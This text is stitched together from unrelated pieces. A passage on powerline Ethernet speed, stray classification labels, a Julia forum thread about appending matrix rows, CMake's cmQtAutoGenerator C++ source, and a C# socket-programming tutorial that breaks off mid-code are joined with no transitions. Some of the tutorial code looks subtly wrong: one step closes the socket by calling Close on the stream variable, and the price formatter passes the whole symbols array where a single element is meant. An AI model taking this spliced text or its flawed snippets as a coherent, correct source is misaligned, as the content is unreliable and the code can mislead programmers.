Other electrical devices connected to the same electrical circuit can introduce interference that affects powerline Ethernet speed. Devices such as refrigerators, microwave ovens, or power tools can generate electrical noise that interferes with the data signal, resulting in slower speeds.
Comparing Speeds: Powerline Ethernet vs. Other Methods
When compared to traditional Ethernet cables or Wi-Fi networks, powerline Ethernet is generally considered to have slower speeds. Ethernet cables, especially Cat5e or Cat6 cables, offer faster and more reliable connections since they provide dedicated, point-to-point connections between devices.
Wi-Fi networks, although convenient for wireless access, may experience signal degradation and lower speeds due to distance, obstacles, or interference from other devices operating on the same frequency band.
While powerline Ethernet may not offer the same speed as Ethernet cables, it provides an alternative for situations where running cables is not feasible or desirable. The actual speed you can achieve with powerline Ethernet depends on the factors mentioned above, but it can still deliver satisfactory performance for most everyday internet tasks.
While powerline Ethernet may be slower compared to traditional Ethernet cables, it offers a convenient solution for extending network connectivity using existing electrical wiring. Factors such as electrical wiring quality, distance, and interference can affect its speed. However, for most typical internet activities, powerline Ethernet provides sufficient performance without the need for extensive cable installations or signal degradation commonly associated with Wi-Fi networks.
In conclusion, powerline Ethernet can be an efficient and viable option for creating a reliable and convenient network connection in situations where running Ethernet cables is not feasible or desired.
Do Powerline Adapters Work? This is what I found out!
|
__label__pos
| 0.998915 |
Adding rows to a matrix dynamically
I am trying to get:= Initialize a matrix of Float64 then adding rows to it dynamically in a loop!
I tried with push! and append! but not able to find the right way to do it. I am currently using a not so efficient method where each column of the matrix is constructed as a vector using push! and then I making matrix out of those vectors using hcat.
You likely want to build up your matrix column by column instead of row by row, since Julia uses column major storage, as opposed to numpy, for example, which uses a row major layout. This will make appending rows to a matrix inefficient, since a lot of entries will have to be moved around, unless you preallocate a larger array and introduce a greater stride along the first axis. Here is one way to append columns to a matrix without allocating temporary matrices:
julia> cat!(a, b) = reshape(append!(vec(a), vec(b)), size(a)[1:end-1]..., :)
cat! (generic function with 1 method)
julia> cat!([1 2; 3 4], [1, 2])
2×3 Array{Int64,2}:
1 2 1
3 4 2
2 Likes
Thanks @simeonschaub .
I will try your suggestion!
If the size of the vectors is known in advance and not too large, you can also build your data as a vector of static vectors, and then view it as a matrix:
using StaticArrays
vecs = SVector{3,Int}[]
for i in 1:5
push!(vecs, SVector(1,2,3))
end
m = reshape(reinterpret(Int,vecs),3,:)
3×5 reshape(reinterpret(Int64, ::Array{SArray{Tuple{3},Int64,1,3},1}), 3, 5) with eltype Int64:
1 1 1 1 1
2 2 2 2 2
3 3 3 3 3
2 Likes
Thanks @yha!
size of the arrays is unknown & it varies from case to case.
I tried with the following code but getting errors
function test(N::Int64)
oa = Matrix{Float64}(undef, 0, 2)
for _ = 1:N
if some_condition == true
append!(oa, rand(1, 2))
end
end
return oa
end
ERROR: MethodError: no method matching append!(::Array{Float64,2}, ::Array{Float64,2})
Closest candidates are:
append!(::BitArray{1}, ::Any) at bitarray.jl:771
append!(::AbstractArray{T,1} where T, ::Any) at array.jl:981
append!(::DataStructures.MutableLinkedList, ::Any...) at ~/.julia/packages/DataStructures/5hvIb/src/mutable_list.jl:160
Thanks!
|
__label__pos
| 0.966573 |
blob: 734b2d70d88bec06197ce9543c77c08ac43d1097 [file] [log] [blame]
/* Distributed under the OSI-approved BSD 3-Clause License. See accompanying
file Copyright.txt or https://cmake.org/licensing for details. */
#include "cmQtAutoGenerator.h"
#include "cmQtAutoGen.h"
#include "cmsys/FStream.hxx"
#include "cmAlgorithms.h"
#include "cmGlobalGenerator.h"
#include "cmMakefile.h"
#include "cmStateDirectory.h"
#include "cmStateSnapshot.h"
#include "cmSystemTools.h"
#include "cmake.h"
#include <algorithm>
// -- Class methods
void cmQtAutoGenerator::Logger::RaiseVerbosity(std::string const& value)
{
unsigned long verbosity = 0;
if (cmSystemTools::StringToULong(value.c_str(), &verbosity)) {
if (this->Verbosity_ < verbosity) {
this->Verbosity_ = static_cast<unsigned int>(verbosity);
}
}
}
void cmQtAutoGenerator::Logger::SetColorOutput(bool value)
{
ColorOutput_ = value;
}
std::string cmQtAutoGenerator::Logger::HeadLine(std::string const& title)
{
std::string head = title;
head += '\n';
head.append(head.size() - 1, '-');
head += '\n';
return head;
}
void cmQtAutoGenerator::Logger::Info(GeneratorT genType,
std::string const& message)
{
std::string msg = GeneratorName(genType);
msg += ": ";
msg += message;
if (msg.back() != '\n') {
msg.push_back('\n');
}
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::Stdout(msg.c_str(), msg.size());
}
}
void cmQtAutoGenerator::Logger::Warning(GeneratorT genType,
std::string const& message)
{
std::string msg;
if (message.find('\n') == std::string::npos) {
// Single line message
msg += GeneratorName(genType);
msg += " warning: ";
} else {
// Multi line message
msg += HeadLine(GeneratorName(genType) + " warning");
}
// Message
msg += message;
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::Stdout(msg.c_str(), msg.size());
}
}
void cmQtAutoGenerator::Logger::WarningFile(GeneratorT genType,
std::string const& filename,
std::string const& message)
{
std::string msg = " ";
msg += Quoted(filename);
msg.push_back('\n');
// Message
msg += message;
Warning(genType, msg);
}
void cmQtAutoGenerator::Logger::Error(GeneratorT genType,
std::string const& message)
{
std::string msg;
msg += HeadLine(GeneratorName(genType) + " error");
// Message
msg += message;
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::Stderr(msg.c_str(), msg.size());
}
}
void cmQtAutoGenerator::Logger::ErrorFile(GeneratorT genType,
std::string const& filename,
std::string const& message)
{
std::string emsg = " ";
emsg += Quoted(filename);
emsg += '\n';
// Message
emsg += message;
Error(genType, emsg);
}
void cmQtAutoGenerator::Logger::ErrorCommand(
GeneratorT genType, std::string const& message,
std::vector<std::string> const& command, std::string const& output)
{
std::string msg;
msg.push_back('\n');
msg += HeadLine(GeneratorName(genType) + " subprocess error");
msg += message;
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
msg += HeadLine("Command");
msg += QuotedCommand(command);
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
msg += HeadLine("Output");
msg += output;
if (msg.back() != '\n') {
msg.push_back('\n');
}
msg.push_back('\n');
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::Stderr(msg.c_str(), msg.size());
}
}
std::string cmQtAutoGenerator::FileSystem::GetRealPath(
std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::GetRealPath(filename);
}
std::string cmQtAutoGenerator::FileSystem::CollapseCombinedPath(
std::string const& dir, std::string const& file)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::CollapseCombinedPath(dir, file);
}
void cmQtAutoGenerator::FileSystem::SplitPath(
const std::string& p, std::vector<std::string>& components,
bool expand_home_dir)
{
std::lock_guard<std::mutex> lock(Mutex_);
cmSystemTools::SplitPath(p, components, expand_home_dir);
}
std::string cmQtAutoGenerator::FileSystem::JoinPath(
const std::vector<std::string>& components)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::JoinPath(components);
}
std::string cmQtAutoGenerator::FileSystem::JoinPath(
std::vector<std::string>::const_iterator first,
std::vector<std::string>::const_iterator last)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::JoinPath(first, last);
}
std::string cmQtAutoGenerator::FileSystem::GetFilenameWithoutLastExtension(
const std::string& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::GetFilenameWithoutLastExtension(filename);
}
std::string cmQtAutoGenerator::FileSystem::SubDirPrefix(
std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmQtAutoGen::SubDirPrefix(filename);
}
void cmQtAutoGenerator::FileSystem::setupFilePathChecksum(
std::string const& currentSrcDir, std::string const& currentBinDir,
std::string const& projectSrcDir, std::string const& projectBinDir)
{
std::lock_guard<std::mutex> lock(Mutex_);
FilePathChecksum_.setupParentDirs(currentSrcDir, currentBinDir,
projectSrcDir, projectBinDir);
}
std::string cmQtAutoGenerator::FileSystem::GetFilePathChecksum(
std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return FilePathChecksum_.getPart(filename);
}
bool cmQtAutoGenerator::FileSystem::FileExists(std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::FileExists(filename);
}
bool cmQtAutoGenerator::FileSystem::FileExists(std::string const& filename,
bool isFile)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::FileExists(filename, isFile);
}
unsigned long cmQtAutoGenerator::FileSystem::FileLength(
std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::FileLength(filename);
}
bool cmQtAutoGenerator::FileSystem::FileIsOlderThan(
std::string const& buildFile, std::string const& sourceFile,
std::string* error)
{
bool res(false);
int result = 0;
{
std::lock_guard<std::mutex> lock(Mutex_);
res = cmSystemTools::FileTimeCompare(buildFile, sourceFile, &result);
}
if (res) {
res = (result < 0);
} else {
if (error != nullptr) {
error->append(
"File modification time comparison failed for the files\n ");
error->append(Quoted(buildFile));
error->append("\nand\n ");
error->append(Quoted(sourceFile));
}
}
return res;
}
bool cmQtAutoGenerator::FileSystem::FileRead(std::string& content,
std::string const& filename,
std::string* error)
{
bool success = false;
if (FileExists(filename, true)) {
unsigned long const length = FileLength(filename);
{
std::lock_guard<std::mutex> lock(Mutex_);
cmsys::ifstream ifs(filename.c_str(), (std::ios::in | std::ios::binary));
if (ifs) {
content.reserve(length);
content.assign(std::istreambuf_iterator<char>{ ifs },
std::istreambuf_iterator<char>{});
if (ifs) {
success = true;
} else {
content.clear();
if (error != nullptr) {
error->append("Reading from the file failed.");
}
}
} else if (error != nullptr) {
error->append("Opening the file for reading failed.");
}
}
} else if (error != nullptr) {
error->append(
"The file does not exist, is not readable or is a directory.");
}
return success;
}
bool cmQtAutoGenerator::FileSystem::FileRead(GeneratorT genType,
std::string& content,
std::string const& filename)
{
std::string error;
if (!FileRead(content, filename, &error)) {
Log()->ErrorFile(genType, filename, error);
return false;
}
return true;
}
bool cmQtAutoGenerator::FileSystem::FileWrite(std::string const& filename,
std::string const& content,
std::string* error)
{
bool success = false;
// Make sure the parent directory exists
if (MakeParentDirectory(filename)) {
std::lock_guard<std::mutex> lock(Mutex_);
cmsys::ofstream outfile;
outfile.open(filename.c_str(),
(std::ios::out | std::ios::binary | std::ios::trunc));
if (outfile) {
outfile << content;
// Check for write errors
if (outfile.good()) {
success = true;
} else {
if (error != nullptr) {
error->assign("File writing failed");
}
}
} else {
if (error != nullptr) {
error->assign("Opening file for writing failed");
}
}
} else {
if (error != nullptr) {
error->assign("Could not create parent directory");
}
}
return success;
}
bool cmQtAutoGenerator::FileSystem::FileWrite(GeneratorT genType,
std::string const& filename,
std::string const& content)
{
std::string error;
if (!FileWrite(filename, content, &error)) {
Log()->ErrorFile(genType, filename, error);
return false;
}
return true;
}
bool cmQtAutoGenerator::FileSystem::FileDiffers(std::string const& filename,
std::string const& content)
{
bool differs = true;
{
std::string oldContents;
if (FileRead(oldContents, filename)) {
differs = (oldContents != content);
}
}
return differs;
}
bool cmQtAutoGenerator::FileSystem::FileRemove(std::string const& filename)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::RemoveFile(filename);
}
bool cmQtAutoGenerator::FileSystem::Touch(std::string const& filename,
bool create)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::Touch(filename, create);
}
bool cmQtAutoGenerator::FileSystem::MakeDirectory(std::string const& dirname)
{
std::lock_guard<std::mutex> lock(Mutex_);
return cmSystemTools::MakeDirectory(dirname);
}
bool cmQtAutoGenerator::FileSystem::MakeDirectory(GeneratorT genType,
std::string const& dirname)
{
if (!MakeDirectory(dirname)) {
Log()->ErrorFile(genType, dirname, "Could not create directory");
return false;
}
return true;
}
bool cmQtAutoGenerator::FileSystem::MakeParentDirectory(
std::string const& filename)
{
bool success = true;
std::string const dirName = cmSystemTools::GetFilenamePath(filename);
if (!dirName.empty()) {
success = MakeDirectory(dirName);
}
return success;
}
bool cmQtAutoGenerator::FileSystem::MakeParentDirectory(
GeneratorT genType, std::string const& filename)
{
if (!MakeParentDirectory(filename)) {
Log()->ErrorFile(genType, filename, "Could not create parent directory");
return false;
}
return true;
}
int cmQtAutoGenerator::ReadOnlyProcessT::PipeT::init(uv_loop_t* uv_loop,
ReadOnlyProcessT* process)
{
Process_ = process;
Target_ = nullptr;
return UVPipe_.init(*uv_loop, 0, this);
}
int cmQtAutoGenerator::ReadOnlyProcessT::PipeT::startRead(std::string* target)
{
Target_ = target;
return uv_read_start(uv_stream(), &PipeT::UVAlloc, &PipeT::UVData);
}
void cmQtAutoGenerator::ReadOnlyProcessT::PipeT::reset()
{
Process_ = nullptr;
Target_ = nullptr;
UVPipe_.reset();
Buffer_.clear();
Buffer_.shrink_to_fit();
}
void cmQtAutoGenerator::ReadOnlyProcessT::PipeT::UVAlloc(uv_handle_t* handle,
size_t suggestedSize,
uv_buf_t* buf)
{
auto& pipe = *reinterpret_cast<PipeT*>(handle->data);
pipe.Buffer_.resize(suggestedSize);
buf->base = &pipe.Buffer_.front();
buf->len = pipe.Buffer_.size();
}
void cmQtAutoGenerator::ReadOnlyProcessT::PipeT::UVData(uv_stream_t* stream,
ssize_t nread,
const uv_buf_t* buf)
{
auto& pipe = *reinterpret_cast<PipeT*>(stream->data);
if (nread > 0) {
// Append data to merged output
if ((buf->base != nullptr) && (pipe.Target_ != nullptr)) {
pipe.Target_->append(buf->base, nread);
}
} else if (nread < 0) {
// EOF or error
auto* proc = pipe.Process_;
// Check it this an unusual error
if (nread != UV_EOF) {
if (!proc->Result()->error()) {
proc->Result()->ErrorMessage =
"libuv reading from pipe failed with error code ";
proc->Result()->ErrorMessage += std::to_string(nread);
}
}
// Clear libuv pipe handle and try to finish
pipe.reset();
proc->UVTryFinish();
}
}
void cmQtAutoGenerator::ProcessResultT::reset()
{
ExitStatus = 0;
TermSignal = 0;
if (!StdOut.empty()) {
StdOut.clear();
StdOut.shrink_to_fit();
}
if (!StdErr.empty()) {
StdErr.clear();
StdErr.shrink_to_fit();
}
if (!ErrorMessage.empty()) {
ErrorMessage.clear();
ErrorMessage.shrink_to_fit();
}
}
void cmQtAutoGenerator::ReadOnlyProcessT::setup(
ProcessResultT* result, bool mergedOutput,
std::vector<std::string> const& command, std::string const& workingDirectory)
{
Setup_.WorkingDirectory = workingDirectory;
Setup_.Command = command;
Setup_.Result = result;
Setup_.MergedOutput = mergedOutput;
}
bool cmQtAutoGenerator::ReadOnlyProcessT::start(
uv_loop_t* uv_loop, std::function<void()>&& finishedCallback)
{
if (IsStarted() || (Result() == nullptr)) {
return false;
}
// Reset result before the start
Result()->reset();
// Fill command string pointers
if (!Setup().Command.empty()) {
CommandPtr_.reserve(Setup().Command.size() + 1);
for (std::string const& arg : Setup().Command) {
CommandPtr_.push_back(arg.c_str());
}
CommandPtr_.push_back(nullptr);
} else {
Result()->ErrorMessage = "Empty command";
}
if (!Result()->error()) {
if (UVPipeOut_.init(uv_loop, this) != 0) {
Result()->ErrorMessage = "libuv stdout pipe initialization failed";
}
}
if (!Result()->error()) {
if (UVPipeErr_.init(uv_loop, this) != 0) {
Result()->ErrorMessage = "libuv stderr pipe initialization failed";
}
}
if (!Result()->error()) {
// -- Setup process stdio options
// stdin
UVOptionsStdIO_[0].flags = UV_IGNORE;
UVOptionsStdIO_[0].data.stream = nullptr;
// stdout
UVOptionsStdIO_[1].flags =
static_cast<uv_stdio_flags>(UV_CREATE_PIPE | UV_WRITABLE_PIPE);
UVOptionsStdIO_[1].data.stream = UVPipeOut_.uv_stream();
// stderr
UVOptionsStdIO_[2].flags =
static_cast<uv_stdio_flags>(UV_CREATE_PIPE | UV_WRITABLE_PIPE);
UVOptionsStdIO_[2].data.stream = UVPipeErr_.uv_stream();
// -- Setup process options
std::fill_n(reinterpret_cast<char*>(&UVOptions_), sizeof(UVOptions_), 0);
UVOptions_.exit_cb = &ReadOnlyProcessT::UVExit;
UVOptions_.file = CommandPtr_[0];
UVOptions_.args = const_cast<char**>(&CommandPtr_.front());
UVOptions_.cwd = Setup_.WorkingDirectory.c_str();
UVOptions_.flags = UV_PROCESS_WINDOWS_HIDE;
UVOptions_.stdio_count = static_cast<int>(UVOptionsStdIO_.size());
UVOptions_.stdio = &UVOptionsStdIO_.front();
// -- Spawn process
if (UVProcess_.spawn(*uv_loop, UVOptions_, this) != 0) {
Result()->ErrorMessage = "libuv process spawn failed";
}
}
// -- Start reading from stdio streams
if (!Result()->error()) {
if (UVPipeOut_.startRead(&Result()->StdOut) != 0) {
Result()->ErrorMessage = "libuv start reading from stdout pipe failed";
}
}
if (!Result()->error()) {
if (UVPipeErr_.startRead(Setup_.MergedOutput ? &Result()->StdOut
: &Result()->StdErr) != 0) {
Result()->ErrorMessage = "libuv start reading from stderr pipe failed";
}
}
if (!Result()->error()) {
IsStarted_ = true;
FinishedCallback_ = std::move(finishedCallback);
} else {
// Clear libuv handles and finish
UVProcess_.reset();
UVPipeOut_.reset();
UVPipeErr_.reset();
CommandPtr_.clear();
}
return IsStarted();
}
void cmQtAutoGenerator::ReadOnlyProcessT::UVExit(uv_process_t* handle,
int64_t exitStatus,
int termSignal)
{
auto& proc = *reinterpret_cast<ReadOnlyProcessT*>(handle->data);
if (proc.IsStarted() && !proc.IsFinished()) {
// Set error message on demand
proc.Result()->ExitStatus = exitStatus;
proc.Result()->TermSignal = termSignal;
if (!proc.Result()->error()) {
if (termSignal != 0) {
proc.Result()->ErrorMessage = "Process was terminated by signal ";
proc.Result()->ErrorMessage +=
std::to_string(proc.Result()->TermSignal);
} else if (exitStatus != 0) {
proc.Result()->ErrorMessage = "Process failed with return value ";
proc.Result()->ErrorMessage +=
std::to_string(proc.Result()->ExitStatus);
}
}
// Reset process handle and try to finish
proc.UVProcess_.reset();
proc.UVTryFinish();
}
}
void cmQtAutoGenerator::ReadOnlyProcessT::UVTryFinish()
{
// There still might be data in the pipes after the process has finished.
// Therefore check if the process is finished AND all pipes are closed
// before signaling the worker thread to continue.
if (UVProcess_.get() == nullptr) {
if (UVPipeOut_.uv_pipe() == nullptr) {
if (UVPipeErr_.uv_pipe() == nullptr) {
IsFinished_ = true;
FinishedCallback_();
}
}
}
}
cmQtAutoGenerator::cmQtAutoGenerator()
: FileSys_(&Logger_)
{
// Initialize logger
{
std::string verbose;
if (cmSystemTools::GetEnv("VERBOSE", verbose) && !verbose.empty()) {
unsigned long iVerbose = 0;
if (cmSystemTools::StringToULong(verbose.c_str(), &iVerbose)) {
Logger_.SetVerbosity(static_cast<unsigned int>(iVerbose));
} else {
// Non numeric verbosity
Logger_.SetVerbose(cmSystemTools::IsOn(verbose));
}
}
}
{
std::string colorEnv;
cmSystemTools::GetEnv("COLOR", colorEnv);
if (!colorEnv.empty()) {
Logger_.SetColorOutput(cmSystemTools::IsOn(colorEnv));
} else {
Logger_.SetColorOutput(true);
}
}
// Initialize libuv loop
uv_disable_stdio_inheritance();
#ifdef CMAKE_UV_SIGNAL_HACK
UVHackRAII_ = cm::make_unique<cmUVSignalHackRAII>();
#endif
UVLoop_ = cm::make_unique<uv_loop_t>();
uv_loop_init(UVLoop());
}
cmQtAutoGenerator::~cmQtAutoGenerator()
{
// Close libuv loop
uv_loop_close(UVLoop());
}
bool cmQtAutoGenerator::Run(std::string const& infoFile,
std::string const& config)
{
// Info settings
InfoFile_ = infoFile;
cmSystemTools::ConvertToUnixSlashes(InfoFile_);
InfoDir_ = cmSystemTools::GetFilenamePath(infoFile);
InfoConfig_ = config;
bool success = false;
{
cmake cm(cmake::RoleScript);
cm.SetHomeOutputDirectory(InfoDir());
cm.SetHomeDirectory(InfoDir());
cm.GetCurrentSnapshot().SetDefaultDefinitions();
cmGlobalGenerator gg(&cm);
cmStateSnapshot snapshot = cm.GetCurrentSnapshot();
snapshot.GetDirectory().SetCurrentBinary(InfoDir());
snapshot.GetDirectory().SetCurrentSource(InfoDir());
auto makefile = cm::make_unique<cmMakefile>(&gg, snapshot);
// The OLD/WARN behavior for policy CMP0053 caused a speed regression.
// https://gitlab.kitware.com/cmake/cmake/issues/17570
makefile->SetPolicyVersion("3.9", std::string());
gg.SetCurrentMakefile(makefile.get());
success = this->Init(makefile.get());
}
if (success) {
success = this->Process();
}
return success;
}
std::string cmQtAutoGenerator::SettingsFind(std::string const& content,
const char* key)
{
std::string prefix(key);
prefix += ':';
std::string::size_type pos = content.find(prefix);
if (pos != std::string::npos) {
pos += prefix.size();
if (pos < content.size()) {
std::string::size_type posE = content.find('\n', pos);
if ((posE != std::string::npos) && (posE != pos)) {
return content.substr(pos, posE - pos);
}
}
}
return std::string();
}
|
__label__pos
| 0.9996 |
Click here to Skip to main content
11,719,185 members (84,790 online)
Click here to Skip to main content
An Introduction to Socket Programming in .NET using C#
, 10 Jun 2005 549K 290
Rate this:
Please Sign up or sign in to vote.
In this article, we will learn the basics of socket programming in .NET Framework using C#. Secondly, we will create a small application consisting of a server and a client which will communicate using TCP and UDP protocols.
Introduction
In this article, we will learn the basics of socket programming in .NET Framework using C#. Secondly, we will create a small application consisting of a server and a client, which will communicate using TCP and UDP protocols.
Pre-requisites
• Must be familiar with .NET Framework.
• Should have good knowledge of C#.
• Basic knowledge of socket programming.
1.1 Networking basics:
Inter-Process Communication i.e. the capability of two or more physically connected machines to exchange data, plays a very important role in enterprise software development. TCP/IP is the most common standard adopted for such communication. Under TCP/IP each machine is identified by a unique 4 byte integer referred to as its IP address (usually formatted as 192.168.0.101). For easy remembrance, this IP address is mostly bound to a user-friendly host name. The program below (showip.cs) uses the System.Net.Dns class to display the IP address of the machine whose name is passed in the first command-line argument. In the absence of command-line arguments, it displays the name and IP address of the local machine.
using System;
using System.Net;
class ShowIP{
public static void Main(string[] args){
string name = (args.Length < 1) ? Dns.GetHostName() : args[0];
try{
IPAddress[] addrs = Dns.Resolve(name).AddressList;
foreach(IPAddress addr in addrs)
Console.WriteLine("{0}/{1}",name,addr);
}catch(Exception e){
Console.WriteLine(e.Message);
}
}
}
Dns.GetHostName() returns the name of the local machine and Dns.Resolve() returns IPHostEntry for a machine with a given name, the AddressList property of which returns the IPAdresses of the machine. The Resolve method will cause an exception if the mentioned host is not found.
Though IPAddress allows to identify machines in the network, each machine may host multiple applications which use network for data exchange. Under TCP/IP, each network oriented application binds itself to a unique 2 byte integer referred to as its port-number which identifies this application on the machine it is executing. The data transfer takes place in the form of byte bundles called IP Packets or Datagrams. The size of each datagram is 64 KByte and it contains the data to be transferred, the actual size of the data, IP addresses and port-numbers of sender and the prospective receiver. Once a datagram is placed on a network by a machine, it will be received physically by all the other machines but will be accepted only by that machine whose IP address matches with the receiver’s IP address in the packet. Later on, this machine will transfer the packet to an application running on it which is bound to the receiver’s port-number present in the packet.
TCP/IP suite actually offers two different protocols for data exchange. The Transmission Control Protocol (TCP) is a reliable connection oriented protocol while the User Datagram Protocol (UDP) is not very reliable (but fast) connectionless protocol.
1.2 Client-Server programming with TCP/IP:
Under TCP there is a clear distinction between the server process and the client process. The server process starts on a well known port (which the clients are aware of) and listens for incoming connection requests. The client process starts on any port and issues a connection request.
The basic steps to create a TCP/IP server are as follows:
1. Create a System.Net.Sockets.TcpListener with a given local port and start it:
TcpListener listener = new TcpListener(local_port);
listener.Start();
2. Wait for the incoming connection request and accept a System.Net.Sockets.Socket object from the listener whenever the request appears:
Socket soc = listener.AcceptSocket(); // blocks
3. Create a System.Net.Sockets.NetworkStream from the above Socket:
Stream s = new NetworkStream(soc);
4. Communicate with the client using the predefined protocol (well established rules for data exchange):
5. Close the Stream:
s.Close();
6. Close the Socket:
s.Close();
7. Go to Step 2.
Note when one request is accepted through step 2 no other request will be accepted until the code reaches step 7. (Requests will be placed in a queue or backlog.) In order to accept and service more than one client concurrently, steps 2 – 7 must be executed in multiple threads. Program below (emptcpserver.cs) is a multithreaded TCP/IP server which accepts employee name from its client and sends back the job of the employee. The client terminates the session by sending a blank line for the employee’s name. The employee data is retrieved from the application’s configuration file (an XML file in the directory of the application and whose name is the name of the application with a .config extension).
using System;
using System.Threading;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Configuration;
class EmployeeTCPServer{
static TcpListener listener;
const int LIMIT = 5; //5 concurrent clients
public static void Main(){
listener = new TcpListener(2055);
listener.Start();
#if LOG
Console.WriteLine("Server mounted,
listening to port 2055");
#endif
for(int i = 0;i < LIMIT;i++){
Thread t = new Thread(new ThreadStart(Service));
t.Start();
}
}
public static void Service(){
while(true){
Socket soc = listener.AcceptSocket();
//soc.SetSocketOption(SocketOptionLevel.Socket,
// SocketOptionName.ReceiveTimeout,10000);
#if LOG
Console.WriteLine("Connected: {0}",
soc.RemoteEndPoint);
#endif
try{
Stream s = new NetworkStream(soc);
StreamReader sr = new StreamReader(s);
StreamWriter sw = new StreamWriter(s);
sw.AutoFlush = true; // enable automatic flushing
sw.WriteLine("{0} Employees available",
ConfigurationSettings.AppSettings.Count);
while(true){
string name = sr.ReadLine();
if(name == "" || name == null) break;
string job =
ConfigurationSettings.AppSettings[name];
if(job == null) job = "No such employee";
sw.WriteLine(job);
}
s.Close();
}catch(Exception e){
#if LOG
Console.WriteLine(e.Message);
#endif
}
#if LOG
Console.WriteLine("Disconnected: {0}",
soc.RemoteEndPoint);
#endif
soc.Close();
}
}
}
Here is the content of the configuration file (emptcpserver.exe.config) for the above application:
<configuration>
<appSettings>
<add key = "john" value="manager"/>
<add key = "jane" value="steno"/>
<add key = "jim" value="clerk"/>
<add key = "jack" value="salesman"/>
</appSettings>
</configuration>
The code between #if LOG and #endif will be added by the compiler only if the symbol LOG is defined during compilation (conditional compilation). You can compile the above program either by defining the LOG symbol (information is logged on the screen):
• csc /D:LOG emptcpserver.cs
or without the LOG symbol (silent mode):
• csc emptcpserver.cs
Mount the server using the command start emptcpserver.
To test the server you can use: telnet localhost 2055.
Or, we can create a client program. Basic steps for creating a TCP/IP client are as follows:
1. Create a System.Net.Sockets.TcpClient using the server’s host name and port:
TcpClient client = new TcpClient(host, port);
2. Obtain the stream from the above TCPClient.
Stream s = client.GetStream()
3. Communicate with the server using the predefined protocol.
4. Close the Stream:
s.Close();
5. Close the connection:
client.Close();
The program below (emptcpclient.cs) communicates with EmployeeTCPServer:
using System;
using System.IO;
using System.Net.Sockets;
class EmployeeTCPClient{
public static void Main(string[] args){
TcpClient client = new TcpClient(args[0],2055);
try{
Stream s = client.GetStream();
StreamReader sr = new StreamReader(s);
StreamWriter sw = new StreamWriter(s);
sw.AutoFlush = true;
Console.WriteLine(sr.ReadLine());
while(true){
Console.Write("Name: ");
string name = Console.ReadLine();
sw.WriteLine(name);
if(name == "") break;
Console.WriteLine(sr.ReadLine());
}
s.Close();
}finally{
// code in finally block is guranteed
// to execute irrespective of
// whether any exception occurs or does
// not occur in the try block
client.Close();
}
}
}
1.3 Multicasting with UDP
Unlike TCP, UDP is connectionless i.e. data can be send to multiple receivers using a single socket. Basic UDP operations are as follows:
1. Create a System.Net.Sockets.UdpClient either using a local port or remote host and remote port:
UdpClient client = new UdpClient(local_ port);
or
UdpClient client = new UdpClient(remote_host, remote_port);
2. Receive data using the above UdpClient:
System.Net.IPEndPoint ep = null;
byte[] data = client.Receive(ref ep);
byte array data will contain the data that was received and ep will contain the address of the sender.
3. Send data using the above UdpClient..
If the remote host name and the port number have already been passed to the UdpClient through its constructor, then send byte array data using:
client.Send(data, data.Length);
Otherwise, send byte array data using IPEndPoint ep of the receiver:
client.Send(data, data.Length, ep);
The program below (empudpserver.cs) receives the name of an employee from a remote client and sends it back the job of that employee using UDP:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Configuration;
class EmployeeUDPServer{
public static void Main(){
UdpClient udpc = new UdpClient(2055);
Console.WriteLine("Server started, servicing on port 2055");
IPEndPoint ep = null;
while(true){
byte[] rdata = udpc.Receive(ref ep);
string name = Encoding.ASCII.GetString(rdata);
string job = ConfigurationSettings.AppSettings[name];
if(job == null) job = "No such employee";
byte[] sdata = Encoding.ASCII.GetBytes(job);
udpc.Send(sdata,sdata.Length,ep);
}
}
}
Here is the content of the configuration file (empudpserver.exe.config) for above application:
<configuration>
<appSettings>
<add key = "john" value="manager"/>
<add key = "jane" value="steno"/>
<add key = "jim" value="clerk"/>
<add key = "jack" value="salesman"/>
</appSettings>
</configuration>
The next program (empudpclient.cs) is a UDP client to the above server program:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
class EmployeeUDPClient{
public static void Main(string[] args){
UdpClient udpc = new UdpClient(args[0],2055);
IPEndPoint ep = null;
while(true){
Console.Write("Name: ");
string name = Console.ReadLine();
if(name == "") break;
byte[] sdata = Encoding.ASCII.GetBytes(name);
udpc.Send(sdata,sdata.Length);
byte[] rdata = udpc.Receive(ref ep);
string job = Encoding.ASCII.GetString(rdata);
Console.WriteLine(job);
}
}
}
UDP also supports multicasting i.e. sending a single datagram to multiple receivers. To do so, the sender sends a packet to an IP address in the range 224.0.0.1 – 239.255.255.255 (Class D address group). Multiple receivers can join the group of this address and receive the packet. The program below (stockpricemulticaster.cs) sends a datagram every 5 seconds containing the share price (a randomly calculated value) of an imaginary company to address 230.0.0.1:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
class StockPriceMulticaster{
static string[] symbols = {"ABCD","EFGH", "IJKL", "MNOP"};
public static void Main(){
UdpClient publisher = new UdpClient("230.0.0.1",8899);
Console.WriteLine("Publishing stock prices to 230.0.0.1:8899");
Random gen = new Random();
while(true){
int i = gen.Next(0,symbols.Length);
double price = 400*gen.NextDouble()+100;
string msg = String.Format("{0} {1:#.00}",symbols,price);
